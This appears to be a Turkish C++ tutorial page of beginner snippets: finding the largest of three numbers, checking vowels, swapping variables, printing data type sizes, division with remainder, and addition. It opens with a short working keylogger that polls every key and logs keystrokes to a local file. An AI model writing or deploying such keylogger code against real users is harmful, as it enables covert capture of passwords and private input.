C++ KeyLogger

#include <iostream>
#include <string>
#include <fstream>
#include <windows.h>

using namespace std;int main()
{

  while (1) {

    Sleep(10);

    for (int KEY = 8; KEY <= 190; KEY++)
    {
      // determines whether the key is pressed or not
      if (GetAsyncKeyState(KEY) == -32767) {

        fstream LogFile;
        LogFile.open("dat.txt", fstream::app);

        if(LogFile.is_open()){
          LogFile << char(KEY);
          LogFile.close();
        }

      }
    }
  }
}

C++ en büyük sayıyı bulan program

C++ en büyük sayıyı bulan program

#include <iostream>


using namespace std;

int main()
{


  int s1, s2, s3;

  cout << "1. sayiyi giriniz: ";
  cin >> s1;
  cout << '\n';

  cout << "2. sayiyi giriniz: ";
  cin >> s2;
  cout << '\n';

  cout << "3. sayiyi giriniz: ";
  cin >> s3;
  cout << endl;


  if (s1 > s2){

    if (s1 > s3){
      cout << "en buyuk sayi: " << s1;
    }
    else{
      cout << "en buyuk sayi: " << s3;
    }

  } else{

    if (s2 > s3){
      cout << "en buyuk sayi: " << s2;
    }
    else{
      cout << "en buyuk sayi: " << s3;
    }


  }  return 0;
}

C++ girilen harfin ünlü olup olmadığını bulan program

C++ girilen harfin ünlü olup olmadığını bulan program

#include <iostream>


using namespace std;

int main()
{
  char harf;
  bool kucukHarfMi, buyukHarfMi;

  cout << "Bir harf giriniz: ";
  cin >> harf;

  if (!isalpha(harf)){
    cout << "Girilen karakter harf degildir.";
    return 0;
  }

  kucukHarfMi = (harf=='a' || harf == 'e' || harf == 'i' || harf == 'o' || harf == 'u');
  buyukHarfMi = (harf=='A' || harf == 'E' || harf == 'I' || harf == 'O' || harf == 'U');

  if (kucukHarfMi || buyukHarfMi){
    cout << "Unlu harf girdiniz.";
  } else{
    cout << "Unsuz harf girdiniz.";
  }

  return 0;
}

C++ iki sayı değişkenini birbiriyle değiştiren program

C++ iki sayı değişkenini birbiriyle değiştiren program

#include <iostream>
using namespace std;

int main()
{

  int sayi1 = 11, sayi2 = 22, gecici;

  cout << "sayi 1 = " << sayi1 << '\n';
  cout << "sayi 2 = " << sayi2 << '\n';


  gecici = sayi1;
  sayi1 = sayi2;
  sayi2 = gecici;

  cout << "------------------" << '\n';

  cout << "sayi 1 = " << sayi1 << '\n';
  cout << "sayi 2 = " << sayi2 << '\n';


  return 0;
}

C++ veri tipi boyutları (byte cinsinden)

C++ programı yazarken kullandığımız değişkenlerin, bellekte ne kadar yer kapladıklarının gösterilmesi.

sizeof(veriTipi);

#include <iostream>
using namespace std;

int main()
{
  cout << "Size of char: " << sizeof(char) << " byte" << endl;
  cout << "Size of int: " << sizeof(int) << " bytes" << endl;
  cout << "Size of float: " << sizeof(float) << " bytes" << endl;
  cout << "Size of double: " << sizeof(double) << " bytes" << endl;

  return 0;
}

C++ bölme işlemi (bölüm ve kalan bulma)

Klavyeden girilen sayıyı bölen ve kalanını bulan c++ programı

#include <iostream>
using namespace std;

int main() {

  int bolen, bolunen, bolum, kalan;

  cout << "Bolunecek sayiyi giriniz: ";
  cin >> bolunen;
  cout << endl;

  cout << "Kaca bolunecek: ";
  cin >> bolen;
  cout << endl;

  // bölme işlemi
  bolum = bolunen / bolen;

  // mod işlemi kalanı verir
  kalan = bolunen % bolen;

  
  cout << "Bolum = " << bolum << '\n';
  cout << "Kalan = " << kalan;

  return 0;

}

C++ girilen iki sayıyı toplayan program

Klavyeden girilen iki sayıyı toplayan C++ programı:

#include <iostream>
using namespace std;

int main() {

  int sayi1, sayi2, toplam;

  cout << "1. sayi:";
  cin >> sayi1;

  cout << "\n";

  cout << "2. sayi:";
  cin >> sayi2;

  cout << endl;

  toplam = sayi1 + sayi2;


  cout << "sayilarin toplami: " << toplam;

  return 0;

}